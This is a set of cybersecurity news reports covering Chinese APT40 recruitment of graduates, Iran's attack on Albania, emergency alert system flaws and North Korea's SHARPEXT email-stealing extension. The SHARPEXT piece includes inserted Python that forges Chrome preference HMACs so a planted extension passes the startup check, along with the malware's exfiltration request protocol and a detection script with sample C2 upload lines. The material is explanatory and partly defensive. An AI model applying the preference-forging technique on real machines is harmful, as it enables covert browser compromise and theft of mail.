
China lured graduate jobseekers into digital espionage


Chinese university students have been lured to work at a secretive technology company that masked the true nature of their jobs: researching western targets for spying and translating hacked documents as part of Beijing’s industrial-scale intelligence regime.

The Financial Times has identified and contacted 140 potential translators, mostly recent graduates who have studied English at public universities in Hainan, Sichuan and Xi’an. They had responded to job adverts at Hainan Xiandun, a company that was located in the tropical southern island of Hainan.

The application process included translation tests on sensitive documents obtained from US government agencies and instructions to research individuals at Johns Hopkins University, a key intelligence target.

Hainan Xiandun is alleged by a 2021 US federal indictment to have been a cover for the Chinese hacking group APT40. Western intelligence agencies have accused APT40 of infiltrating government agencies, companies and universities across the US, Canada, Europe and the Middle East, under the orders of China’s Ministry of State Security (MSS).

The FBI sought to disrupt the activities of Hainan Xiandun last July by indicting three state security officials in Hainan province—Ding Xiaoyang, Cheng Qingmin and Zhu Yunmin—for their alleged role in establishing the company as a front for state-backed espionage. Another man mentioned in the indictment, Wu Shurong, is believed to be a hacker who helped supervise employees at Hainan Xiandun.

Western intelligence services also seek out prospective spies from universities, with applicants undergoing rigorous vetting and training before joining the likes of the CIA in the US or the UK’s GCHQ signals intelligence agency.

But Chinese graduates targeted by Hainan Xiandun appear to have been unwittingly drawn into a life of espionage. Job adverts from the company were posted on university websites for translators without further explanation of the nature of the work.

This could have life-long consequences, as individuals identified as having co-operated with the MSS through their work for Hainan Xiandun are likely to face difficulty in living and working in western countries, a key motivation for many students who study foreign languages.

The FT contacted all 140 individuals on a leaked list of candidates compiled by security officials in the region to corroborate the authenticity of the applications. Several of those contacted initially confirmed their identities, but ended phone calls after being asked about their links to Hainan Xiandun. A few discussed their experience of the hiring process.

Their applications provide insight into the tactics of APT40, known for targeting biomedical, robotics and maritime research institutions as part of wider efforts to gain knowledge of western industrial strategy and steal sensitive data.

Hacking on that scale requires a huge workforce of English speakers who can help identify hacking targets, cyber technicians who can access adversaries’ systems and intelligence officers to analyze the stolen material.

Zhang, an English language graduate who applied to Hainan Xiandun, told the FT that a recruiter had asked him to go beyond conventional translation duties by researching the Johns Hopkins Applied Physics Laboratory, with instructions to find out information on the institution, including the CVs of the directors on its board, the building’s architecture and details of research contracts it had struck with clients.

The APL, a big recipient of US Department of Defense research funds, is likely to be of significant intelligence interest to Beijing, and the individuals who work there are prime hacking targets.

The instruction document asked the job candidates to download “software to get behind the Great Firewall.” It warns that the research will involve consulting websites such as Facebook, which is banned in China and so requires a VPN, software that masks the location of the user in order to gain access.

“It was very clear that this was not a translation company,” said Zhang, who decided against continuing with his application.

Dakota Cary, an expert in Chinese cyber espionage and former security analyst at Georgetown University, said the student translators were likely to be helping with researching organizations or individuals who might prove to be fruitful sources of sensitive information.

“The fact that you’re going to have to use a VPN, that you will need to be doing your own research and you need good language skills, all says to me that these students will be identifying hacking targets,” he said.

Cary, who testified earlier this year to the US-China economic and security review commission on Beijing’s cyber capabilities, said the instruction to investigate Johns Hopkins was an indicator of the level of initiative and ability to acquire specialist knowledge that the translators were expected to demonstrate.

One security official in the region said the revelations were evidence that the MSS was using university students as a “recruitment pipeline” for its spying activities.

Antony Blinken, US secretary of state, has previously condemned the MSS for building an “ecosystem of criminal contract hackers” who engage in both state-sponsored activities and financially motivated cyber crime. Blinken added that these hackers cost governments and businesses “billions of dollars” in stolen intellectual property, ransom payments and cyber defenses.

Hainan Xiandun asked the applicants to translate a document from the US Office of Infrastructure Research and Development containing technical explanations on preventing corrosion on transport networks and infrastructure. This appeared to test prospective employees’ abilities to interpret complex scientific concepts and terminology.

“It was a very weird process,” said Cindy, an English language student from a respected Chinese university. “I applied online and then the HR person sent me a highly technical test translation.” She decided against continuing with the application.

Adam Kozy, a former FBI official who worked most recently at cyber security company CrowdStrike, said he had not heard of western intelligence enlisting university students without them being given security clearance to collect intelligence.

“The MSS do everything very informally and they like the gray areas,” he said. “It’s interesting to see that they’re relying on a young student workforce to do a lot of the dirty work that may have those knock-on consequences later in life and most likely are not fully explaining those potential risks.”

The MSS did not respond to requests for comment.

Hainan Xiandun solicited applications on university recruitment sites and appears to have a close relationship with Hainan University. The company was registered on the first floor of the university library, home to the student computer room.

One job advert posted on the university’s foreign languages department website called for applications from English-speaking female students and Communist party members. The advert has been deleted since the FT’s queries regarding this story.

Several student applicants to Hainan Xiandun had won school prizes for their language skills and others held the added distinction of holding party membership.

According to the FBI’s indictment, MSS officers “co-ordinated with staff and professors at universities in Hainan and elsewhere in China” to further their intelligence goals. Personnel at one Hainan-based university also helped support and manage Hainan Xiandun as a front company, “including through payroll, benefits and a mailing address,” the indictment reads.

While the FBI accused the university of assisting the MSS in identifying and recruiting hackers and linguists to “penetrate and steal” from computer networks, it does not mention the university’s role in commandeering students to help the cause.

In response to the FT’s findings, Michael Misumi, chief information officer at Johns Hopkins APL, said that “like many technical organizations” the APL “must respond to many cyber threats and takes appropriate measures to continuously defend itself and its systems.”

Hainan University did not respond to requests for comment.

Applicants’ names have been changed to protect their identities

© 2022 The Financial Times Ltd. All rights reserved Not to be redistributed, copied, or modified in any way.


Cyberattack on Albanian government suggests new Iranian aggression


In mid-July, a cyberattack on the Albanian government knocked out state websites and public services for hours. With Russia’s war raging in Ukraine, the Kremlin might seem like the likeliest suspect. But research published on Thursday by the threat intelligence firm Mandiant attributes the attack to Iran. And while Tehran’s espionage operations and digital meddling have shown up all over the world, Mandiant researchers say that a disruptive attack from Iran on a NATO member is a noteworthy escalation.

The digital attacks targeting Albania on July 17 came ahead of the “World Summit of Free Iran,” a conference scheduled to convene in the town of Manëz in western Albania on July 23 and 24. The summit was affiliated with the Iranian opposition group Mujahadeen-e-Khalq, or the People’s Mojahedin Organization of Iran (often abbreviated MEK, PMOI, or MKO). The conference was postponed the day before it was set to begin because of reported, unspecified “terrorist” threats.

Mandiant researchers say that attackers deployed ransomware from the Roadsweep family and may have also utilized a previously unknown backdoor, dubbed Chimneysweep, as well as a new strain of the Zeroclear wiper. Past use of similar malware, the timing of the attacks, other clues from the Roadsweep ransomware note, and activity from actors claiming responsibility for the attacks on Telegram all point to Iran, Mandiant says.

“This is an aggressive escalatory step that we have to recognize,” says John Hultquist, Mandiant’s vice president of intelligence. “Iranian espionage happens all the time all over the world. The difference here is this isn’t espionage. These are disruptive attacks, which affect the lives of everyday Albanians who live within the NATO alliance. And it was essentially a coercive attack to force the hand of the government.”

Iran has conducted aggressive hacking campaigns in the Middle East and particularly in Israel, and its state-backed hackers have penetrated and probed manufacturing, supply, and critical infrastructure organizations. In November 2021, the US and Australian governments warned that Iranian hackers were actively working to gain access to an array of networks related to transportation, health care, and public health entities, among others. “These Iranian government-sponsored APT actors can leverage this access for follow-on operations, such as data exfiltration or encryption, ransomware, and extortion,” the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency wrote at the time.

Tehran has limited how far its attacks have gone, though, largely keeping to data exfiltration and reconnaissance on the global stage. The country has, however, participated in influence operations, disinformation campaigns, and efforts to meddle in foreign elections, including targeting the US.

“We’ve become used to seeing Iran being aggressive in the Middle East where that activity just has never stopped, but outside of the Middle East they’ve been far more restrained,” Hultquist says. “I’m concerned that they may be more willing to leverage their capability outside of the region. And they clearly have no qualms about targeting NATO states, which suggests to me that whatever deterrents we believe exist between us and them may not exist at all.”

With Iran claiming that it now has the ability to produce nuclear warheads, and representatives from the country meeting with US officials in Vienna about a possible revival of the 2015 nuclear deal between the countries, any signal about Iran's possible intentions and risk tolerance when it comes to dealing with NATO is significant.

This story originally appeared on wired.com.


“Huge flaw” threatens US emergency alert system, DHS researcher warns


The US Department of Homeland Security is warning of vulnerabilities in the nation's emergency broadcast network that make it possible for hackers to issue bogus warnings over radio and TV stations.

“We recently became aware of certain vulnerabilities in EAS encoder/decoder devices that, if not updated to most recent software versions, could allow an actor to issue EAS alerts over the host infrastructure (TV, radio, cable network),” the DHS’s Federal Emergency Management Agency (FEMA) warned. “This exploit was successfully demonstrated by Ken Pyle, a security researcher at CYBIR.com, and may be presented as a proof of concept at the upcoming DEFCON 2022 conference in Las Vegas, August 11-14.”

Pyle told reporters at CNN and Bleeping Computer that the vulnerabilities reside in the Monroe Electronics R189 One-Net DASDEC EAS, an Emergency Alert System encoder and decoder. TV and radio stations use the equipment to transmit emergency alerts. The researcher told Bleeping Computer that “multiple vulnerabilities and issues (confirmed by other researchers) haven’t been patched for several years and snowballed into a huge flaw.”

“When asked what can be done after successful exploitation, Pyle said: ‘I can easily obtain access to the credentials, certs, devices, exploit the web server, send fake alerts via crafts message, have them valid / pre-empting signals at will. I can also lock legitimate users out when I do, neutralizing or disabling a response,’” Bleeping Computer added.

This isn’t the first time federal officials have warned of vulnerabilities in the emergency alert system.


North Korea-backed hackers have a clever way to read your Gmail


Researchers have unearthed never-before-seen malware that hackers from North Korea have been using to surreptitiously read and download email and attachments from infected users’ Gmail and AOL accounts.

The malware, dubbed SHARPEXT by researchers from security firm Volexity, uses clever means to install a browser extension for the Chrome and Edge browsers, Volexity reported in a blog post. The extension can't be detected by the email services, and because it reads mail from inside a browser session that has already passed whatever multifactor authentication was in place, MFA, an increasingly popular security measure, plays no role in reining in the account compromise.

The malware has been in use for “well over a year,” Volexity said, and is the work of a hacking group the company tracks as SharpTongue. The group is sponsored by North Korea’s government and overlaps with a group tracked as Kimsuky by other researchers. SHARPEXT is targeting organizations in the US, Europe, and South Korea that work on nuclear weapons and other issues North Korea deems important to its national security.

Volexity President Steven Adair said in an email that the extension gets installed “by way of spear phishing and social engineering where the victim is fooled into opening a malicious document. Previously we have seen DPRK threat actors launch spear phishing attacks where the entire objective was to get the victim to install a browser extension vs it being a post exploitation mechanism for persistence and data theft.” In its current incarnation, the malware works only on Windows, but Adair said there’s no reason it couldn’t be broadened to infect browsers running on macOS or Linux, too.

The blog post added: “Volexity’s own visibility shows the extension has been quite successful, as logs obtained by Volexity show the attacker was able to successfully steal thousands of emails from multiple victims through the malware’s deployment.”

Installing a browser extension during a phishing operation without the end user noticing isn't easy. SHARPEXT's developers have clearly paid attention to prior public research showing how a security mechanism in the Chromium browser engine prevents malware from making changes to sensitive user settings. Each time a legitimate change is made, the browser computes a keyed hash (an HMAC) over the protected preference values and stores it alongside them. At startup, the browser recomputes and verifies those hashes, and if any of them don't match, it discards the tampered values and resets those settings.

For attackers to work around this protection, they must first extract the following from the computer they’re compromising:

  • A copy of the resources.pak file from the browser (which contains the HMAC seed used by Chrome)
  • The user's SID (Windows security identifier) value
  • The original Preferences and Secure Preferences files from the user’s system

After modifying the preference files (and recomputing the hashes so the tampering passes the startup check), SHARPEXT automatically loads the extension and executes a PowerShell script that enables DevTools, the browser's developer tools panel, on the target tab; the extension relies on DevTools being open to do its work.
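The integrity check described above, and why possessing the seed and the device identifier defeats it, as an added example that is not code from Volexity's post or from Chromium's source. It models the scheme the text describes: an HMAC-SHA256 keyed with the seed from resources.pak, computed over the device id, the preference path and the serialized value. The seed, the SID-like device id, the compact-JSON serialization, and the set of tracked paths are all constructed stand-ins; Chrome's real seed, escaping rules and tracked-preference list differ in detail.

```python
import hashlib
import hmac
import json

# Constructed stand-ins for the two secrets the text says SHARPEXT must extract.
# In Chrome the HMAC seed lives in resources.pak and the device id is derived from
# the machine's Windows SID; both values below are fake.
SEED = b"constructed-seed-not-the-real-resources.pak-value"
DEVICE_ID = "S-1-5-21-111111111-222222222-333333333"  # constructed SID-like string


def canonical(value):
    """Serialize a preference value as compact JSON.
    Chrome's exact escaping rules are assumed here, not reproduced bit for bit."""
    return json.dumps(value, separators=(",", ":"), sort_keys=True)


def pref_mac(seed, device_id, path, value):
    """HMAC-SHA256 over device id + preference path + serialized value, hex-encoded:
    the shape of the per-preference MACs Chrome stores under protection.macs."""
    msg = (device_id + path + canonical(value)).encode("utf-8")
    return hmac.new(seed, msg, hashlib.sha256).hexdigest().upper()


def sign_prefs(seed, device_id, prefs):
    """Produce a protection.macs mapping covering every tracked preference path."""
    return {path: pref_mac(seed, device_id, path, prefs[path]) for path in sorted(prefs)}


def verify_prefs(seed, device_id, prefs, macs):
    """Return the set of tracked paths whose current value no longer matches its MAC."""
    tampered = set()
    for path, stored in macs.items():
        expected = pref_mac(seed, device_id, path, prefs.get(path))
        if not hmac.compare_digest(expected, stored):
            tampered.add(path)
    return tampered


# Constructed Secure Preferences excerpt: one legitimately installed extension.
LEGIT_PREFS = {
    "extensions.settings": {
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": {"location": 1, "state": 1},
    },
    "homepage": "https://example.test/",
}


def demo():
    """Show both outcomes: editing prefs without the seed is caught, re-signing with it is not."""
    macs = sign_prefs(SEED, DEVICE_ID, LEGIT_PREFS)

    # Attacker adds an extension entry; location 4 is Chrome's value for an unpacked
    # extension loaded from a directory (path is constructed).
    tampered = json.loads(json.dumps(LEGIT_PREFS))
    tampered["extensions.settings"]["bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"] = {
        "location": 4, "state": 1, "path": "C:\\Users\\victim\\AppData\\Local\\ext",
    }

    # Without the seed the old MACs stay in place and the mismatch is caught at startup.
    detected = verify_prefs(SEED, DEVICE_ID, tampered, macs)

    # With seed and device id in hand the attacker recomputes the MACs and the check passes.
    resigned = sign_prefs(SEED, DEVICE_ID, tampered)
    evaded = verify_prefs(SEED, DEVICE_ID, tampered, resigned)
    return detected, evaded


if __name__ == "__main__":
    print(demo())
```

The point the example makes is that the protection is a keyed integrity check, not a secret the attacker lacks: the key is shipped with the browser and the device id is readable by any code running as the user, so the check only stops tampering by an adversary who has not bothered to read those two inputs, which is exactly the bar SHARPEXT clears.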

"The script runs in an infinite loop checking for processes associated with the targeted browsers," Volexity explained. "If any targeted browsers are found running, the script checks the title of the tab for a specific keyword (for example '05101190,' or 'Tab+' depending on the SHARPEXT version). The specific keyword is inserted into the title by the malicious extension when an active tab changes or when a page is loaded."

The post continued:

The keystrokes sent are equivalent to Control+Shift+J, the shortcut to enable the DevTools panel. Lastly, the PowerShell script hides the newly opened DevTools window by using the ShowWindow() API and the SW_HIDE flag. At the end of this process, DevTools is enabled on the active tab, but the window is hidden.

In addition, this script is used to hide any windows that could alert the victim. Microsoft Edge, for example, periodically displays a warning message to the user (Figure 5) if extensions are running in developer mode. The script constantly checks if this window appears and hides it by using the ShowWindow() and the SW_HIDE flag.


Once installed, the extension can perform the following requests:

(HTTP POST data, followed by its description)

  • mode=list: List previously collected email from the victim to ensure duplicates are not uploaded. This list is continuously updated as SHARPEXT executes.
  • mode=domain: List email domains with which the victim has previously communicated. This list is continuously updated as SHARPEXT executes.
  • mode=black: Collect a blacklist of email senders that should be ignored when collecting email from the victim.
  • mode=newD&d=[data]: Add a domain to the list of all domains viewed by the victim.
  • mode=attach&name=[data]&idx=[data]&body=[data]: Upload a new attachment to the remote server.
  • mode=new&mid=[data]&mbody=[data]: Upload Gmail data to the remote server.
  • mode=attlist: Commented out by the attacker; receive a list of attachments to be exfiltrated.
  • mode=new_aol&mid=[data]&mbody=[data]: Upload AOL data to the remote server.

SHARPEXT allows the hackers to create lists of email addresses to ignore and to keep track of email or attachments that have already been stolen.
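The request table above is enough to write a first-pass detection over outbound web traffic. The following is an added example, not from Volexity's post: it parses form-encoded POST bodies from constructed proxy log lines and flags those whose `mode` value and accompanying parameters match one of the listed SHARPEXT requests. The log format (tab-separated timestamp, client, method, URL, body) and the hostnames are assumptions.

```python
from urllib.parse import parse_qs

# Modes and the extra parameters each carries, taken from the request table above.
SHARPEXT_MODES = {
    "list": set(),
    "domain": set(),
    "black": set(),
    "attlist": set(),
    "newD": {"d"},
    "attach": {"name", "idx", "body"},
    "new": {"mid", "mbody"},
    "new_aol": {"mid", "mbody"},
}


def classify_post_body(body):
    """Return the SHARPEXT mode a form-encoded POST body matches, or None.
    A match requires exactly one mode value and every parameter that mode carries."""
    params = parse_qs(body, keep_blank_values=True)
    modes = params.get("mode", [])
    if len(modes) != 1:
        return None
    required = SHARPEXT_MODES.get(modes[0])
    if required is None or not required.issubset(params):
        return None
    return modes[0]


# Constructed proxy log lines: timestamp, client, method, URL, request body (tab-separated).
# Line 3 is a benign app that also happens to use a "mode" parameter; line 4 is an
# incomplete attach request; line 5 is a GET and carries no body.
SAMPLE_LOG = """\
2022-07-28T09:12:01Z\t10.0.0.5\tPOST\thttp://c2.invalid/u.php\tmode=list
2022-07-28T09:12:03Z\t10.0.0.5\tPOST\thttp://c2.invalid/u.php\tmode=new&mid=17c3a1b2&mbody=RnJvbTogYm9i
2022-07-28T09:12:07Z\t10.0.0.7\tPOST\thttp://intranet.example.test/theme\tmode=dark&user=7
2022-07-28T09:12:09Z\t10.0.0.5\tPOST\thttp://c2.invalid/u.php\tmode=attach&name=q3.pdf
2022-07-28T09:12:11Z\t10.0.0.5\tGET\thttp://c2.invalid/u.php?mode=domain\t
"""


def scan_log(text):
    """Return (client, url, mode) for every POST whose body matches a SHARPEXT request."""
    hits = []
    for line in text.splitlines():
        fields = line.split("\t")
        if len(fields) != 5 or fields[2] != "POST":
            continue
        _ts, client, _method, url, body = fields
        mode = classify_post_body(body)
        if mode is not None:
            hits.append((client, url, mode))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Parameter names such as `mode=new` and `mid=` are generic, so on a busy proxy this logic should be paired with the file and network indicators Volexity published and with the host-side signs the article describes (an unpacked extension in the profile, a long-running PowerShell process alongside the browser) before it is treated as confirmation rather than a lead.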

Volexity's blog post also includes a diagram summarizing the orchestration of the various SHARPEXT components it analyzed.

The blog post provides images, file names, and other indicators that trained people can use to determine if they have been targeted or infected by this malware. The company warned that the threat it poses has grown over time and isn’t likely to go away anytime soon.

“When Volexity first encountered SHARPEXT, it seemed to be a tool in early development containing numerous bugs, an indication the tool was immature,” the company said. “The latest updates and ongoing maintenance demonstrate the attacker is achieving its goals, finding value in continuing to refine it.”
